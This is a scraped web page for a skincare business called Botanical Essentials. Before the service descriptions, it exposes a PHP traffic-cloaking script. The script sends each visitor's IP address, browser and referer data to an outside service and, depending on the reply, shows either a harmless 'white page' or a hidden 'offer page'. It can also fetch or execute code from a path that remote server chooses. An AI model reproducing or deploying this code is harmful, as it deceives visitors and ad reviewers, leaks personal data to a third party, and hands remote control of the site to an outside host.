[ 'verify_peer' => FALSE, 'verify_peer_name' => FALSE ], 'http' => [ 'header' => 'User-Agent: ' . get_user_agent() ] ]); } function get_user_agent() { return ! empty($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; } function get_referer() { return ! empty($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; } function get_query_string() { return ! empty($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : ''; } function get_browser_language() { return ! empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : ''; } $request_data = [ 'label' => '517b3950f1593dd1534157bc82fb4969', 'user_agent' => get_user_agent(), 'referer' => get_referer(), 'query' => get_query_string(), 'lang' => get_browser_language(), 'ip_address' => get_real_ip_address() ]; $request_data = http_build_query($request_data); $success_codes = [200, 201, 204, 206]; $ch = curl_init('https://cloakit.house/api/v1/check'); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_CUSTOMREQUEST => 'POST', CURLOPT_SSL_VERIFYPEER => FALSE, CURLOPT_TIMEOUT => 15, CURLOPT_POSTFIELDS => $request_data ]); $result = curl_exec($ch); $info = curl_getinfo($ch); curl_close($ch); if (isset($info['http_code']) && in_array($info['http_code'], $success_codes)) { $body = json_decode($result, TRUE); // Check for errors if ( ! empty($body['filter_type'])) { $messages = [ 'subscription_expired' => 'Your Subscription Expired.', 'flow_deleted' => 'Flow Deleted.', 'flow_banned' => 'Flow Banned.', ]; if (isset($messages[$body['filter_type']])) { exit($messages[$body['filter_type']]); } } if ( ! empty($body['url_white_page']) && ! empty($body['url_offer_page'])) { // Offer Page if ($body['filter_page'] == 'offer') { if ($body['mode_offer_page'] == 'loading') { if (filter_var($body['url_offer_page'], FILTER_VALIDATE_URL)) { echo str_replace('', '', file_get_contents($body['url_offer_page'], FALSE, create_stream_context())); } elseif (file_exists($body['url_offer_page'])) { if (pathinfo($body['url_offer_page'], PATHINFO_EXTENSION) == 'html') { echo file_get_contents($body['url_offer_page'], FALSE, create_stream_context()); } else { require_once($body['url_offer_page']); } } else { exit('Offer Page Not Found.'); } } if ($body['mode_offer_page'] == 'redirect') { header('Location: ' . $body['url_offer_page'], TRUE, 302); exit(0); } if ($body['mode_offer_page'] == 'iframe') { echo ''; exit(0); } } // White Page if ($body['filter_page'] == 'white') { if ($body['mode_white_page'] == 'loading') { if (filter_var($body['url_white_page'], FILTER_VALIDATE_URL)) { echo str_replace('', '', file_get_contents($body['url_white_page'], FALSE, create_stream_context())); } elseif (file_exists($body['url_white_page'])) { if (pathinfo($body['url_white_page'], PATHINFO_EXTENSION) == 'html') { echo file_get_contents($body['url_white_page'], FALSE, create_stream_context()); } else { require_once($body['url_white_page']); } } else { exit('White Page Not Found.'); } } if ($body['mode_white_page'] == 'redirect') { header('Location: ' . $body['url_white_page'], TRUE, 302); exit(0); } } } else { exit('Offer Page or White Page Not Found.'); } } else { exit('Try again later or contact support.'); } ?>
top of page

Botanical Essentials

Explore our services and get in touch

Our Services

  • 01.

    Custom Routine Builder

    Discover the perfect natural skincare regimen tailored to your sensitive skin's unique needs. Our guided process asks key questions about your skin type and concerns to recommend the ideal combination of Glore's Essentials products for optimal results. Achieve a healthier complexion with a routine designed just for you.

  • 02.

    Gentle Skin Renewal

    This curated set brings together our most effective all-natural products specifically designed to calm and rejuvenate sensitive skin. Address common concerns like redness or dryness with a synergistic blend of ingredients chosen for their soothing properties. Experience visible improvements and a more comfortable, radiant complexion.

  • 03.

    Natural Ingredient Spotlight

    Explore the power of nature with our detailed guide to the all-natural ingredients used in Glore's Essentials products. Learn about their specific benefits for sensitive skin and how they contribute to healthy, glowing results. Understand exactly what you're applying to your skin for informed choices and peace of mind.

bottom of page